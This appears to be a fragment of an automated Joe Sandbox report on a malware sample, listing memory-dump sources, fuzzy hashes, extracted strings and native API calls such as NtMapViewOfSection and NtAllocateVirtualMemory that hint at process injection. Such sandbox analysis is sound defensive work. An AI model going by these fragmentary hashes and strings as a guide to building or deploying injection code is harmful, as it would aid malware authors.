                                            • Instruction Fuzzy Hash: 00339176F1063A8BCB14CE69C884699B7E2BF98310F4A866ADC19EB341D774DD45CBC0

                                            Control-flow Graph
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1509033258.0000000008250000.00000040.00000800.00020000.00000000.sdmp, Offset: 08250000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_8250000_bPkG0wTVon.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: Q+.$;f$[f$[y${\$P
                                            • API String ID: 0-1567697126
                                            • Opcode ID: 4cdb4449730107f2db708b0eb183e90b77bd43077a97f263086206f727bc5583
                                            • Instruction ID: 046eaca94b046724cf4db3b6a0eb84bc506384390ba4735878efe3af75d2b788
                                            • Opcode Fuzzy Hash: 4cdb4449730107f2db708b0eb183e90b77bd43077a97f263086206f727bc5583
                                            • Instruction Fuzzy Hash: 12F18975B502058FCB18CF68D9C095AF7E7AF88300B69C569E809DB356DB71ED46CB80
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1509332868.0000000008310000.00000040.00000800.00020000.00000000.sdmp, Offset: 08310000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_8310000_bPkG0wTVon.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: l67$!V)$%F8U$>76
                                            • API String ID: 0-2735805732
                                            • Opcode ID: fd8c35a531e37c8fcc6a900cbcec98c3579f6c8e49cba48f0eefc62aed0e87a4
                                            • Instruction ID: 2e260b9356b9780e843346f37418ebfd0c2d66a0255415a73d722ddda7c3845f
                                            • Opcode Fuzzy Hash: fd8c35a531e37c8fcc6a900cbcec98c3579f6c8e49cba48f0eefc62aed0e87a4
                                            • Instruction Fuzzy Hash: 5AF25376E106398BDB29CF58CC80699B7F6AB84700F1A85E9D809FB351D7749E85CF80
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1509673377.00000000085E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 085E0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_85e0000_bPkG0wTVon.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 1%0$2B6k$d$d
                                            • API String ID: 0-582358824
                                            • Opcode ID: b8369c1d1d6ce0cf72b5bfbe18bf71536eca4e54b4f8820be6a07ffe6c82a954
                                            • Instruction ID: 1d609a764095a2705ad9e0cd1ff25f75cbaf85010039bfa69c6c7554c4f8376d
                                            • Opcode Fuzzy Hash: b8369c1d1d6ce0cf72b5bfbe18bf71536eca4e54b4f8820be6a07ffe6c82a954
                                            • Instruction Fuzzy Hash: 0FE26B76A015198FCB18CF59CD84A99B7B7BBC8311F5A82A9E409DB351DB70ED82CF40

                                            Control-flow Graph
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1504939245.0000000005DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DF0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5df0000_bPkG0wTVon.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: ,0$g$;^/$E@_9$QV\1
                                            • API String ID: 0-227804990
                                            • Opcode ID: b2d305125a2fff5a7c355186ea70646215d6cd88d9aa2238e9c18b18089b7ace
                                            • Instruction ID: 3ee8fe8f1dbf1cf9d75b0b28456ea219da90aefc9785670926149b0583c6058f
                                            • Opcode Fuzzy Hash: b2d305125a2fff5a7c355186ea70646215d6cd88d9aa2238e9c18b18089b7ace
                                            • Instruction Fuzzy Hash: 53B2A774E00218AFCB58CFA8C881A9DFBB2BF88314F2485E9D549A7355D735AE91CF50

                                            Control-flow Graph
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1509033258.0000000008250000.00000040.00000800.00020000.00000000.sdmp, Offset: 08250000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_8250000_bPkG0wTVon.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: Iy2$Iy2
                                            • API String ID: 0-95489057
                                            • Opcode ID: a75981a1a68c8d0f538be9b2595ed2e449c91abadb2aa5e7270854fa4384b229
                                            • Instruction ID: 2fb214fba9f7d3434c9c07ad439c6c796bb3181270c6a62e4b38fcbee27d6f14
                                            • Opcode Fuzzy Hash: a75981a1a68c8d0f538be9b2595ed2e449c91abadb2aa5e7270854fa4384b229
                                            • Instruction Fuzzy Hash: 98C1C371F102188FD714DFA8C894A6DBBE2EF88311F19846ED809EB345DB759C06CB91

                                            Control-flow Graph
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1509230686.00000000082A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 082A0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_82a0000_bPkG0wTVon.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: *t=z$.2&N$E
                                            • API String ID: 0-3343810366
                                            • Opcode ID: 64a124b177537190026ae303c7ea46a2d312278d09730125a8e6844c3cc0f5a1
                                            • Instruction ID: df5b76272e5deaa70cda3b5cad855dda7f53f1201dccfa9e6cea63eccd953e7a
                                            • Opcode Fuzzy Hash: 64a124b177537190026ae303c7ea46a2d312278d09730125a8e6844c3cc0f5a1
                                            • Instruction Fuzzy Hash: E8524C76E102298FCB24DF68C9906DDB7F2BB88310F1581AAD949EB350DA759D85CF80

                                            Control-flow Graph
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1504939245.0000000005DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DF0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5df0000_bPkG0wTVon.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: c7^$XX}q$$}q
                                            • API String ID: 0-2761388198
                                            • Opcode ID: 3a45a83150d1f821d0dc6c1cbc35564f33c8cd964c39c026ae44cb6c498cd35a
                                            • Instruction ID: 51ee479a4e8c425cfdec43f780952b4320ce3a4d7bb8fba955a230a476d762fa
                                            • Opcode Fuzzy Hash: 3a45a83150d1f821d0dc6c1cbc35564f33c8cd964c39c026ae44cb6c498cd35a
                                            • Instruction Fuzzy Hash: 4742BE35B002059FCB18DFA8D8D09A9B7F2FF88304B56C56AD9099B745DB71ED4ACB80
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1504939245.0000000005DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DF0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5df0000_bPkG0wTVon.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 2%%$PH}q$$}q
                                            • API String ID: 0-1129934225
                                            • Opcode ID: f333251bc5c716902cf8b8d109ab697edfa34b9eb258e52a27a6bc5f010a3690
                                            • Instruction ID: b538a1b2cbf0bc770872977753619e6425dd83ce5f58fc47e0fd307693d04284
                                            • Opcode Fuzzy Hash: f333251bc5c716902cf8b8d109ab697edfa34b9eb258e52a27a6bc5f010a3690
                                            • Instruction Fuzzy Hash: A622A135B001159FC714DB68C994A6AF7E2FF88314B1AC56AD90AEB346DB71EC42CBD0
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1509033258.0000000008250000.00000040.00000800.00020000.00000000.sdmp, Offset: 08250000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_8250000_bPkG0wTVon.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: ?^.L$PH}q
                                            • API String ID: 0-2355326592
                                            • Opcode ID: a3f8f27c828669867692171310d229ddb8fbc8f57811e54d3e6da8f9832edab2
                                            • Instruction ID: 7de77fe99871ce6fea7ad9036aa7c07c1e13d6f8242672410f4fad89c427adea
                                            • Opcode Fuzzy Hash: a3f8f27c828669867692171310d229ddb8fbc8f57811e54d3e6da8f9832edab2
                                            • Instruction Fuzzy Hash: 9DF25D75E102258FC754DF68D894A99FBB2BF88310F1585AAD809EB341DB71ED86CF80
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1504939245.0000000005DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DF0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5df0000_bPkG0wTVon.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: ?)(g$PH}q
                                            • API String ID: 0-609040070
                                            • Opcode ID: b79c19146f66a982089bf25c374e273dbed18496bcf5a910c3878dfa753375bc
                                            • Instruction ID: bec74c9775071df0a0e78abfef1bc4e20bdd1ee2595494a2e5f2e54f24326d4f
                                            • Opcode Fuzzy Hash: b79c19146f66a982089bf25c374e273dbed18496bcf5a910c3878dfa753375bc
                                            • Instruction Fuzzy Hash: 43C2C471F142298FD714DF68C890AAAB7E7AF88300F1585AAD80AE7355DB34AD45CFD0

                                             Control-flow Graph

                                             Control-flow graph: function at 5dff0d0 (basic blocks 5dff0d0 through 5dff43c; calls 5dfeccc, 5dfecd8, 5dfecf0 and 5dfece4; CreateToolhelp32Snapshot called in block 5dff396-5dff41f)
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1504939245.0000000005DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DF0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5df0000_bPkG0wTVon.jbxd
                                            Similarity
                                            • API ID: CreateSnapshotToolhelp32
                                            • String ID: Iy2
                                            • API String ID: 3332741929-1648239622
                                            • Opcode ID: 3de663a4cd5956f12adb0485d8155f1ccb7f3c213c00abe21e5ff84769219b5c
                                            • Instruction ID: af9c530cea2fad885acf2bce941c187f4fd09daaee72990f7d2ec0695b2aa00c
                                            • Opcode Fuzzy Hash: 3de663a4cd5956f12adb0485d8155f1ccb7f3c213c00abe21e5ff84769219b5c
                                            • Instruction Fuzzy Hash: BE91B236E0022A9BCB14CF69C88069EF7F6BF88310B1AC56AD915E7354DB70AC45CBD0
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1504939245.0000000005DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DF0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5df0000_bPkG0wTVon.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: $t5g$C
                                            • API String ID: 0-3053290550
                                            • Opcode ID: 486caa88dffd6a505954a871bccd127df255746b9377ab64af74de64bd198374
                                            • Instruction ID: 7a50f3e39b539c9506b78e4e9e77c84b24b726b84953a281b31e9d1bf05efeee
                                            • Opcode Fuzzy Hash: 486caa88dffd6a505954a871bccd127df255746b9377ab64af74de64bd198374
                                            • Instruction Fuzzy Hash: 4082B272F001284BDB58DB7888906AEB7E7AF98700F05856ED84EF7344DA789D458FD1
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1504939245.0000000005DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DF0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5df0000_bPkG0wTVon.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: $t5g$C
                                            • API String ID: 0-3053290550
                                            • Opcode ID: c27be5aed3f57d506898f94ff8abab8d1ea9706c19ac59e1d25ed1600ec51891
                                            • Instruction ID: 5e6e6e6ed3a1984c1b7b97b6b41bb79c4adca31203afbf04bfe94708ed676a84
                                            • Opcode Fuzzy Hash: c27be5aed3f57d506898f94ff8abab8d1ea9706c19ac59e1d25ed1600ec51891
                                            • Instruction Fuzzy Hash: F482B172F101284BDB58DBB888906AEB7E7AF98700F05856ED80EF7344DA789D458FD1
                                            APIs
                                            • NtMapViewOfSection.NTDLL(?,?,00000000,?,?,?,?,?,?,?,?), ref: 04D34A5E
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1502501634.0000000004D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D30000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_4d30000_bPkG0wTVon.jbxd
                                            Similarity
                                            • API ID: SectionView
                                            • String ID: Iy2
                                            • API String ID: 1323581903-1648239622
                                            • Opcode ID: 369dea5d2d06fb1d23b3fbb7dbed02db4f70e6d9d63e3b7ba80927eed6144f15
                                            • Instruction ID: 3a613679d8c2f35db1311cd7fe13c271fc8fc63070d5452afb592255336dab49
                                            • Opcode Fuzzy Hash: 369dea5d2d06fb1d23b3fbb7dbed02db4f70e6d9d63e3b7ba80927eed6144f15
                                            • Instruction Fuzzy Hash: B431D175900209AFDF11DFAAD984ADEBFF5FF48324F14841AE919A7210C739A950CFA4
                                            APIs
                                            • NtMapViewOfSection.NTDLL(?,?,00000000,?,?,?,?,?,?,?,?), ref: 04D34A5E
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1502501634.0000000004D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D30000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_4d30000_bPkG0wTVon.jbxd
                                            Similarity
                                            • API ID: SectionView
                                            • String ID: Iy2
                                            • API String ID: 1323581903-1648239622
                                            • Opcode ID: f44dffc6fa8cc21cba589f705ae61496e2df452a3d8eb451bff3c7398ecb32bf
                                            • Instruction ID: 2cd32560991dccfaf011f1f9b0580774435e4dd77373a02660b72d9c610abb3d
                                            • Opcode Fuzzy Hash: f44dffc6fa8cc21cba589f705ae61496e2df452a3d8eb451bff3c7398ecb32bf
                                            • Instruction Fuzzy Hash: F531D175900208AFCF11DFAAD884ADEBFF5BF48324F14841AE919A3210C739A950CFA4
                                            APIs
                                            • NtCreateSection.NTDLL(?,?,?,?,?,?,?), ref: 04D348A4
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1502501634.0000000004D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D30000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_4d30000_bPkG0wTVon.jbxd
                                            Similarity
                                            • API ID: CreateSection
                                            • String ID: Iy2
                                            • API String ID: 2449625523-1648239622
                                            • Opcode ID: 0416e8171a0b433117e92a8af809103f9f69d7def7cdd0ffc6f7629b601e0730
                                            • Instruction ID: ccb13527e50daf317a0b03537f540bfaf7a5a6aef0538da1af61873979437ef0
                                            • Opcode Fuzzy Hash: 0416e8171a0b433117e92a8af809103f9f69d7def7cdd0ffc6f7629b601e0730
                                            • Instruction Fuzzy Hash: CD21F5B1D01259AFDB01DFAAD980ADEFFB5FF58310F50841AE918A7200C7799951CFA0
                                            APIs
                                            • NtProtectVirtualMemory.NTDLL(?,?,?,?,?), ref: 04D343A9
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1502501634.0000000004D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D30000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_4d30000_bPkG0wTVon.jbxd
                                            Similarity
                                            • API ID: MemoryProtectVirtual
                                            • String ID: Iy2
                                            • API String ID: 2706961497-1648239622
                                            • Opcode ID: f2becdfb18985b7135b950084247488c2616f47749b07a2e7a5fdc40863e1e6f
                                            • Instruction ID: 729acddce14410f7403dc6a66bb4fd794ed877bc58d10b22cf3d98a267350eb0
                                            • Opcode Fuzzy Hash: f2becdfb18985b7135b950084247488c2616f47749b07a2e7a5fdc40863e1e6f
                                            • Instruction Fuzzy Hash: F821F2B5D003499FCB10DFAAD984ADEFBF5FF48310F24842AE519A7240C779A900CBA5
                                            APIs
                                            • NtCreateSection.NTDLL(?,?,?,?,?,?,?), ref: 04D348A4
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1502501634.0000000004D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D30000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_4d30000_bPkG0wTVon.jbxd
                                            Similarity
                                            • API ID: CreateSection
                                            • String ID: Iy2
                                            • API String ID: 2449625523-1648239622
                                            • Opcode ID: e63e225c6b004a28f7f253258bd7577d65e4f86bd393755003718bcf3ef8496d
                                            • Instruction ID: df6484cd5c16eadc50fadcb9177de4cbd3a0a2169596ca7bf39018de16d8b0c4
                                            • Opcode Fuzzy Hash: e63e225c6b004a28f7f253258bd7577d65e4f86bd393755003718bcf3ef8496d
                                            • Instruction Fuzzy Hash: 4D21F4B1D01259AFDB00DFAAD980ADEFBB5FF48310F10842AE918A7200C7799950CBA0
                                            APIs
                                            • NtDeviceIoControlFile.NTDLL(?,?,?,?,00000000,?,?,?,?,?), ref: 04D34BFE
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1502501634.0000000004D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D30000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_4d30000_bPkG0wTVon.jbxd
                                            Similarity
                                            • API ID: ControlDeviceFile
                                            • String ID: Iy2
                                            • API String ID: 3512290074-1648239622
                                            • Opcode ID: 48c52ae0cfbc7bef1ca0feca269f5b2f7860d4861da18bfb19ea4b2d4f9364e6
                                            • Instruction ID: ef1d4039d4842e830a45d013fcd7ce3026ca5366dee0c67f47e49249519e8519
                                            • Opcode Fuzzy Hash: 48c52ae0cfbc7bef1ca0feca269f5b2f7860d4861da18bfb19ea4b2d4f9364e6
                                            • Instruction Fuzzy Hash: 1C2123728002099FCF11CFAAD840ADEBBF5BF48324F148419E919B7210C739A951CFA0
                                            APIs
                                            • NtOpenFile.NTDLL(?,?,?,?,?,?), ref: 04D347C9
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1502501634.0000000004D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D30000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_4d30000_bPkG0wTVon.jbxd
                                            Similarity
                                            • API ID: FileOpen
                                            • String ID: Iy2
                                            • API String ID: 2669468079-1648239622
                                            • Opcode ID: 17c9c4a3e2d28a12c4c7dcebbcf2c686dd0bc50d0386963e523874a1a208432f
                                            • Instruction ID: 5e7abea1abfb2e6e239bef1f929cd17fe6d41ab3cab17ac0818f1191f5d656e9
                                            • Opcode Fuzzy Hash: 17c9c4a3e2d28a12c4c7dcebbcf2c686dd0bc50d0386963e523874a1a208432f
                                            • Instruction Fuzzy Hash: 342114B5D01219AFCB00CFAAD984ADEFBB4FF48310F50842AE518B7200C779A914CBE0
                                            APIs
                                            • NtProtectVirtualMemory.NTDLL(?,?,?,?,?), ref: 04D343A9
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1502501634.0000000004D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D30000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_4d30000_bPkG0wTVon.jbxd
                                            Similarity
                                            • API ID: MemoryProtectVirtual
                                            • String ID: Iy2
                                            • API String ID: 2706961497-1648239622
                                            • Opcode ID: ba61fff2c2f8ecbcb90dd0efb0b76632cbe112494802080adf82a2a7be10b30e
                                            • Instruction ID: 47f49655080b461e722351ec79303e58232d0ec524e84f8d882077895ac7d934
                                            • Opcode Fuzzy Hash: ba61fff2c2f8ecbcb90dd0efb0b76632cbe112494802080adf82a2a7be10b30e
                                            • Instruction Fuzzy Hash: A821E3B5D013499FCB10DFAAD984ADEFBF5FF48310F64842AE519A7240C779A901CBA1
                                            APIs
                                            • NtOpenFile.NTDLL(?,?,?,?,?,?), ref: 04D347C9
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1502501634.0000000004D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D30000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_4d30000_bPkG0wTVon.jbxd
                                            Similarity
                                            • API ID: FileOpen
                                            • String ID: Iy2
                                            • API String ID: 2669468079-1648239622
                                            • Opcode ID: 620c1763eebb6a12884f53b0faec9553838031ee4ad8a378d43bee60930d558b
                                            • Instruction ID: 1c431beaad94e76fddd1859b0e1ed94dcfa3827d166d57c63da674ddba0a55d3
                                            • Opcode Fuzzy Hash: 620c1763eebb6a12884f53b0faec9553838031ee4ad8a378d43bee60930d558b
                                            • Instruction Fuzzy Hash: C92114B5D01209AFCB00CFAAD984ADEFBB5FF08310F10852AE518B7240C7799A15CBA1
                                            APIs
                                            • NtDeviceIoControlFile.NTDLL(?,?,?,?,00000000,?,?,?,?,?), ref: 04D34BFE
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1502501634.0000000004D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D30000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_4d30000_bPkG0wTVon.jbxd
                                            Similarity
                                            • API ID: ControlDeviceFile
                                            • String ID: Iy2
                                            • API String ID: 3512290074-1648239622
                                            • Opcode ID: d8af989a3894c8d76b40f6d566f31f2372b0a12bb654f41270dd0052270ab755
                                            • Instruction ID: f0515aed415aedd027e9b5414990af50b31c0adcce9942d9d604e5078e1d419b
                                            • Opcode Fuzzy Hash: d8af989a3894c8d76b40f6d566f31f2372b0a12bb654f41270dd0052270ab755
                                            • Instruction Fuzzy Hash: F52123768002099FCF11CFAAD884ADFBBF5FF48324F14841AE919A7210C779A951CFA0
                                            APIs
                                            • NtAllocateVirtualMemory.NTDLL(?,?,?,?,?,?), ref: 04D3447B
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1502501634.0000000004D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D30000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_4d30000_bPkG0wTVon.jbxd
                                            Similarity
                                            • API ID: AllocateMemoryVirtual
                                            • String ID: Iy2
                                            • API String ID: 2167126740-1648239622
                                            • Opcode ID: e7a21a65836a29fa1eb9913b1a3378eab2098adba45eb6eea9527a1e0c31e5ea
                                            • Instruction ID: 4b89a74d2cab2110d71ba4241da7868fb72d5c6e8fc42bb3f862bc4467bebfe4
                                            • Opcode Fuzzy Hash: e7a21a65836a29fa1eb9913b1a3378eab2098adba45eb6eea9527a1e0c31e5ea
                                            • Instruction Fuzzy Hash: 232123B5D003099FCF10CFAAD884ADEFBF5BF48314F50842AE919A7200C778A940CBA0
                                            APIs
                                            • NtQueryVolumeInformationFile.NTDLL(?,?,?,?,?), ref: 04D34B27
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1502501634.0000000004D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D30000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_4d30000_bPkG0wTVon.jbxd
                                            Similarity
                                            • API ID: FileInformationQueryVolume
                                            • String ID: Iy2
                                            • API String ID: 634242254-1648239622
                                            • Opcode ID: caa8000e70f027bc70e2b0ca7fa865623e4845a39b3154474be0551b1b052e2b
                                            • Instruction ID: 226f57ade501fa05503137af53edbcbb7366bb4edbe63b62b51065947f39f36b
                                            • Opcode Fuzzy Hash: caa8000e70f027bc70e2b0ca7fa865623e4845a39b3154474be0551b1b052e2b
                                            • Instruction Fuzzy Hash: 26213575D002499FCB10CFAAD884AEEFBF5BF58320F14842AE419A7200C7799901CFA0
                                            APIs
                                            • NtAllocateVirtualMemory.NTDLL(?,?,?,?,?,?), ref: 04D3447B
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1502501634.0000000004D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D30000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_4d30000_bPkG0wTVon.jbxd
                                            Similarity
                                            • API ID: AllocateMemoryVirtual
                                            • String ID: Iy2
                                            • API String ID: 2167126740-1648239622
                                            • Opcode ID: b4fe1f05f55aa8b6a484e2ed54bbde79c9429dd9cc614790494ba993047c3b74
                                            • Instruction ID: 0a42f5a8267359c33a1f090e74cd3a7ed6c978e5759d89bc3a99c26eccdc6e72
                                            • Opcode Fuzzy Hash: b4fe1f05f55aa8b6a484e2ed54bbde79c9429dd9cc614790494ba993047c3b74
                                            • Instruction Fuzzy Hash: BB2112B59003499FCF10CFAAD8806DEBBF5BF48314F50842AE559A7210C7799955CBA0
                                            APIs
                                            • NtQueryVolumeInformationFile.NTDLL(?,?,?,?,?), ref: 04D34B27
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1502501634.0000000004D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D30000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_4d30000_bPkG0wTVon.jbxd
                                            Similarity
                                            • API ID: FileInformationQueryVolume
                                            • String ID: Iy2
                                            • API String ID: 634242254-1648239622
                                            • Opcode ID: 838b62a6d75bef58ca8a52928851985914a4f30655e4f661cda72bc365f6af3c
                                            • Instruction ID: 7b1866642d5125ab21ce9530680c28be4a17b48de2471d9f9c53b1d8bf44a8a9
                                            • Opcode Fuzzy Hash: 838b62a6d75bef58ca8a52928851985914a4f30655e4f661cda72bc365f6af3c
                                            • Instruction Fuzzy Hash: 3D2113759002499FDB10DFAAD884ADEFBF5BF58320F14842AD419A7240C778A900CFA1
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1502501634.0000000004D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D30000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_4d30000_bPkG0wTVon.jbxd
                                            Similarity
                                            • API ID: Close
                                            • String ID: Iy2
                                            • API String ID: 3535843008-1648239622
                                            • Opcode ID: fea0d206e9588c4da152fa2836deee02fc9bc75bb807ad20737e9027da05f441
                                            • Instruction ID: ce8e543e5a8794096bd5a8e51e574fa8b015834beca70bef5138cef32395775b
                                            • Opcode Fuzzy Hash: fea0d206e9588c4da152fa2836deee02fc9bc75bb807ad20737e9027da05f441
                                            • Instruction Fuzzy Hash: 231155B1C003498FDB20DFAAC5457EEBFF5AF88320F24881AC419B7240C639A941CBA4
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1502501634.0000000004D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D30000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_4d30000_bPkG0wTVon.jbxd
                                            Similarity
                                            • API ID: Close
                                            • String ID: Iy2
                                            • API String ID: 3535843008-1648239622
                                            • Opcode ID: 4c8f7c73e4d1f47e8db2fb2fce5d379786e6e34e47a0e13f2b6ae6725653da2e
                                            • Instruction ID: d48888fc2dd489dcdf177a8d5e9dd20cbc657fe675a906b45eea7e86149eedb5
                                            • Opcode Fuzzy Hash: 4c8f7c73e4d1f47e8db2fb2fce5d379786e6e34e47a0e13f2b6ae6725653da2e
                                            • Instruction Fuzzy Hash: A41128759003498FDB10DFAAC5457DFFBF5AF88324F248819C419B7240C679A945CBA4
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1509230686.00000000082A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 082A0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_82a0000_bPkG0wTVon.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: $w8W
                                            • API String ID: 0-3174752524
                                            • Opcode ID: c704cfa6b39446d7a723bc6d68526273bacf1ba340782620c2d7efca251af50c
                                            • Instruction ID: cd68501bdbe29e13630888da61142a8f3112a28c3f57b8de57c114f2d9e293d8
                                            • Opcode Fuzzy Hash: c704cfa6b39446d7a723bc6d68526273bacf1ba340782620c2d7efca251af50c
                                            • Instruction Fuzzy Hash: 0CF29076E106298FCB18CEA8C88059EB7F6BF88310B5A856AD819FB355D774DC45CBC0
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1509673377.00000000085E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 085E0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_85e0000_bPkG0wTVon.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: d
                                            • API String ID: 0-2564639436
                                            • Opcode ID: 533bb52d12a1fb85a5a0089a085d61384f53864d43cb8d01d80daddaca7d6e87
                                            • Instruction ID: 7a301f895ddc4d0a882ab8a4b0f9a749f688e9efb19824f885036e283f787ee5
                                            • Opcode Fuzzy Hash: 533bb52d12a1fb85a5a0089a085d61384f53864d43cb8d01d80daddaca7d6e87
                                            • Instruction Fuzzy Hash: 7B132075E006298FDB64CF58C984A99F7F2BF88310F1586AAE809EB355D7709D85CF80
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1509230686.00000000082A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 082A0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_82a0000_bPkG0wTVon.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: +#@$:86
                                            • API String ID: 0-802956954
                                            • Opcode ID: f2b84d0db1d624ce107dd198d6d549c4151806714d79b1cbe5fffafa9a3b04a8
                                            • Instruction ID: 957dfa1c5b9045f8288900dad34b0b69fe4a189555b214112be0dbfd30e0eb91
                                            • Opcode Fuzzy Hash: f2b84d0db1d624ce107dd198d6d549c4151806714d79b1cbe5fffafa9a3b04a8
